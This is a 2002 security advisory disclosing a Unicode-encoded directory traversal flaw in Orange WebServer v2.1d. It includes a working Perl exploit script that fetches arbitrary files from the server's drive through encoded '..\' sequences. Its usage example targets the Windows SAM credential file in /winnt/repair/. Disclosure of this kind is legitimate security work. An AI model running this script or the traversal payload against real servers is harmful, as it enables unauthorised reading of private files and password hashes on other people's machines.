Orange WebServer v2.1d Unicode Directory Traversal Vulnerability

Type

File Disclosure

Release Date

October 6, 2002

Product / Vendor

Orange Web Server can turn any PC into a web server.

Orange Web Server has the following features:

- Highly optimized - very fast and very small memory footprint
- Easy to install and configure
- Dynamic IP publishing. Click here to learn more.
- Simple administration
- Server side scripting using a subset of the Jscript language. Click here to learn more.
- Standard CGI Implementation
- Run on Windows 95/98/NT/2000

Summary

Due to a vulnerability in Orange WebServer v2.1d, it is possible to bypass the URL security check and manipulate files on the remote host. In this attack we will exploit this vulnerability and then use it to download any file a remote machine. This would potentially enable a malicious user who visited the web site to gain private files and information on the machine.

This version is the one which Matt Moore's directory traversal vulnerability was corrected. http://online.securityfocus.com/bid/5197/

Exploit

This exploit works by an attacker constructing a URL that would cause Orange WebServer to navigate to any desired folder in the same logical drive and access the files in it. This can be achieved by using the Unicode character representations of "/" and "\". This allows a user to traverse the server to any directory on the same logical drive as the web application. In addition to this, unauthenticated users can perform the following get in these directories.

==================== SNIP ====================

#!/usr/bin/perl -w

die "\nOrange WebServer v2.1d Unicode Directory Traversal Vulnerability / SecurityOffice\n\nUsage: $0 <host> <directory> <file> / Example: $0 www.target.com /winnt/repair/ sam\n\n" if $#ARGV <2;

print &get($ARGV[0], $ARGV[1], $ARGV[2]);

exit 0;

sub get {

$host = $ARGV[0];

$directory = $ARGV[1];

$file = $ARGV[2];

system "lynx $host/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c$directory%5c$file";

print "File $file Download Completed!\n\n";

}

==================== SNIP ====================

Tested

Orange WebServer v2.1d / Windows 2000 sp3

Vulnerable

Orange WebServer v2.1d

Disclaimer

http://www.securityoffice.net is not responsible for the misuse or illegal use of any of the information and/or the software listed on this security advisory.

Author

Tamer Sahin
ts(at)securityoffice.net
http://www.securityoffice.net